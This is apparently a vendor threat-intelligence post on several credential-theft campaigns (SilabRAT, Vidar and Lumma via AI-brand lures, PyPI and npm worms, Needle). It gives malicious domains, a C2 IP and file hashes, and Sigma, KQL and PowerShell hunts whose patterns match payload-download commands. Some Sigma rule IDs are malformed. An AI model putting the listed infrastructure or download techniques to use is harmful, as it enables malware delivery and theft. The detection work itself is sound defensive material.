SilabRAT MaaS, AI Brand Impersonation, and PyPI Supply Chain Attacks: Credential Theft Campaigns — OTX Pulse Analysis | Security Arsenal

Recent OTX pulses reveal a convergence of sophisticated credential theft operations targeting financial and technology sectors. These campaigns are driven by the commoditization of malware through Malware-as-a-Service (MaaS) models like SilabRAT and Needle, alongside widespread social engineering abusing the current AI hype cycle.

Campaign 1 (AI Impersonation): Storm-3075 is leveraging interest in AI platforms (ChatGPT, Claude, Copilot) via malvertising and SEO poisoning to distribute Vidar, Lumma Stealer, and GhostSocks. The objective is credential harvesting and financial fraud.
Campaign 2 (SilabRAT MaaS): Threat actor o1oo1 is marketing SilabRAT on dark web forums ($5,000/mo). This advanced RAT uses Hidden VNC (hVNC) for invisible remote control and browser profile cloning to bypass MFA, specifically targeting cryptocurrency wallets.
Campaign 3 (Supply Chain): A supply chain attack affecting PyPI and npm is distributing Hades, Mini Shai-Hulud, and Miasma worms. By using typosquatted packages and trojanized native extensions, attackers are targeting bioinformatics and MCP developers to steal credentials and maintain persistence.
Campaign 4 (Social Media): Vidar Stealer distribution has expanded to TikTok and Instagram Reels. Fake software tutorials lure victims into running PowerShell commands that download the payload.
Campaign 5 (Needle C2): A modular crypto-stealing platform dubbed "Needle" was found with exposed C2 keys. It impersonates wallet apps (MetaMask, Exodus) to steal cryptocurrency via browser extension spoofers and Rust-based agents.

Threat Actor / Malware Profile

SilabRAT (Actor: o1oo1)

Distribution: Sold on dark web forums; likely distributed via phishing or initial access brokers.
Payload Behavior: Remote Access Trojan (RAT) featuring Hidden VNC (hVNC) for stealthy remote control.
C2 Communication: Connects to C2 infrastructure (e.g., 91.199.163.124) to receive commands and exfiltrate data.
Persistence Mechanism: Uses HijackLoader for execution and likely registry run keys or scheduled tasks.
Anti-Analysis: Uses AsmCrypt for obfuscation to evade detection.
Objective: Credential theft, session hijacking (cookie cloning), and cryptocurrency wallet draining.

Vidar Stealer & Lumma Stealer (Actor: Storm-3075)

Distribution: Malvertising (impersonating AI brands), SEO poisoning, fake TikTok tutorials.
Payload Behavior: Information stealer targeting browser data, saved passwords, cookies, and cryptocurrency wallets. Often delivered via Hijack Loader or Oyster.
C2 Communication: Exfiltrates stolen data to C2 servers; domains observed include brokeapt.com.
Persistence: Often temporary; executed via loader or user-initiated script.
Anti-Analysis: Uses packers and loaders to hinder static analysis.
Objective: Bulk credential harvesting for sale on dark web markets or immediate fraud.

Supply Chain Worms (Hades, Miasma)

Distribution: Malicious PyPI wheels (.abi3.so extensions) and npm packages targeting developers.
Payload Behavior: Python-based worms that execute on import or via startup hooks. They steal environment variables, SSH keys, and credentials.
C2 Communication: Reports back to actor-controlled infrastructure.
Persistence: Infects the Python environment, ensuring execution on system startup or developer environment usage.
Anti-Analysis: Uses split loader-payload architecture to evade signature detection.
Objective: Compromise developer environments to steal source code and credentials.

IOC Analysis

The provided IOCs include:

Domains: brokeapt.com, msget.run, d4ug.site (Used for C2 or payload delivery).
IPs: 91.199.163.124 (SilabRAT C2).
Hostnames: pan.rongtv.xyz, pan.ssffaa19.xyz (Likely payload hosting).
File Hashes (SHA1/SHA256): Multiple hashes for SilabRAT loaders, Vidar samples, and Hades worms.

Operational Guidance: SOC teams should immediately block these domains and IPs at the perimeter and firewall. File hashes should be uploaded to EDR solutions for quarantine. The PowerShell commands associated with the TikTok campaign (downloading from msget.run) should be added to script block logging detection rules.

Detection Engineering

Sigma Rules

YAML

---
title: Potential Malicious PyPI Package Import (Hades/Miasma)
id: 8c6d4e12-1f3a-4b5c-9e8d-2f3a4b5c6d7e
description: Detects execution of Python modules importing from suspicious known malicious packages or suspicious .so extension loading patterns associated with Hades/Miasma worms.
status: experimental
date: 2026/06/11
author: Security Arsenal
references:
    - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious
tags:
    - attack.execution
    - attack.t1059.006
logsource:
    category: process_creation
    product: windows
detection:
    selection_python:
        Image|endswith: '\python.exe'
        CommandLine|contains:
            - '-c'
            - 'import'
    selection_suspicious_packages:
        CommandLine|contains:
            - 'mini-shai-hulud'
            - 'miasma'
            - 'hades'
            - 'bioinformatics'
    selection_so_load:
        CommandLine|contains: '.abi3.so'
    condition: 1 of selection_*
falsepositives:
    - Legitimate bioinformatics research or developer activity
level: high

---
title: PowerShell Download from Suspicious Tutorials (Vidar Stealer)
id: 9d7e5f23-2g4b-5c6d-0f9e-3g4b5c6d7e8f
description: Detects PowerShell commands downloading files from domains associated with fake TikTok/Instagram software tutorials distributing Vidar.
status: experimental
date: 2026/06/11
author: Security Arsenal
references:
    - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_pwsh:
        Image|endswith: '\powershell.exe'
    selection_download:
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'iwr'
            - 'wget'
            - 'DownloadString'
    selection_iocs:
        CommandLine|contains:
            - 'msget.run'
            - 'd4ug.site'
            - 'brokeapt.com'
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical

---
title: SilabRAT C2 Connection Pattern
id: 0e8f6a34-3h5c-6d7e-1f0g-4h5c6d7e8f9g
description: Detects network connections to known SilabRAT C2 infrastructure associated with the o1oo1 threat actor.
status: experimental
date: 2026/06/11
author: Security Arsenal
references:
    - https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection_ip:
        DestinationIp|startswith: '91.199.163'
    selection_port:
        DestinationPort: 443
    condition: all of selection_*
falsepositives:
    - Rare, legitimate traffic to this IP block should be investigated.
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for PowerShell downloads from known Vidar Stealer domains
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("Invoke-WebRequest", "DownloadString", "iwr", "wget")
| where ProcessCommandLine has_any ("msget.run", "d4ug.site", "brokeapt.com")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for network connections to SilabRAT C2 IP
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP == "91.199.163.124"
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for potential malicious Python processes loading suspicious extensions
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName endswith "python.exe"
| where ProcessCommandLine contains ".so" or ProcessCommandLine contains "import"
| where ProcessCommandLine matches regex @"mini-shai-hulud|miasma|hades"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath
| order by Timestamp desc

PowerShell Hunt Script

PowerShell

# SilabRAT and Vidar Persistence & Artifact Hunter
# Checks for file presence of known IOCs and suspicious persistence mechanisms

$Hashes = @(
    "4f5c5b3ef45cfff7721754487a86aeff9a2e6e32",
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623"
)

$Domains = @(
    "brokeapt.com",
    "msget.run",
    "d4ug.site"
)

function Get-FileHashByPath {
    param ($Path)
    if (Test-Path $Path) {
        return (Get-FileHash -Path $Path -Algorithm SHA256).Hash.ToLower()
    }
    return $null
}

Write-Host "[+] Scanning for malicious file hashes..."
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | Where-Object { 
        $_.Length -gt 0kb -and $_.Extension -match '\.(exe|dll|ps1|so)' 
    } | ForEach-Object {
        $Hash = Get-FileHashByPath -Path $_.FullName
        if ($Hash -in $Hashes) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | Hash: $Hash" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking Hosts file for malicious domains..."
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $Domains) {
        if ($HostsContent -match $Domain) {
            Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $Domain" -ForegroundColor Yellow
        }
    }
}

Write-Host "[+] Checking for suspicious persistence mechanisms (Run keys)..."
$RunPaths = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
)

foreach ($Path in $RunPaths) {
    if (Test-Path $Path) {
        Get-ItemProperty -Path $Path | ForEach-Object {
            $Props = Get-Member -InputObject $_ -MemberType NoteProperty | Where-Object { $_.Name -ne "PSPath" -and $_.Name -ne "PSParentPath" -and $_.Name -ne "PSChildName" -and $_.Name -ne "PSDrive" -and $_.Name -ne "PSProvider" }
            foreach ($Prop in $Props) {
                $Value = $_.$($Prop.Name)
                if ($Domains | Where-Object { $Value -like "*$_*" }) {
                    Write-Host "[!] SUSPICIOUS RUN KEY: $($Prop.Name) = $Value" -ForegroundColor Yellow
                }
            }
        }
    }
}

Response Priorities

Immediate:
- Block all identified IOCs (Domains: brokeapt.com, msget.run, d4ug.site; IP: 91.199.163.124) at the proxy, firewall, and DNS sinkhole level.
- Scan endpoints for the listed file hashes associated with SilabRAT, Vidar, and Needle.
- Identify and quarantine systems exhibiting PowerShell behavior matching the Sigma rules above.
24h:
- Initiate credential resets for accounts accessed from infected endpoints, specifically targeting those with access to cryptocurrency wallets or high-value financial systems.
- Review browser extension logs and installed extensions for unauthorized "MetaMask" or "Trust Wallet" impersonators (Needle campaign).
- Hunt for Python environments that may have installed malicious packages (Hades/Miasma) in developer workstations.
1 Week:
- Implement application allowlisting for PowerShell execution and strict egress filtering for developer workstations.
- Conduct security awareness training focused on "AI Brand" phishing and the dangers of downloading software from social media tutorials.
- Harden the software supply chain by requiring dependency verification (SBOM) for all internal PyPI and npm package usage.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

SilabRAT MaaS, AI Brand Impersonation, and PyPI Supply Chain Attacks: Credential Theft Campaigns — OTX Pulse Analysis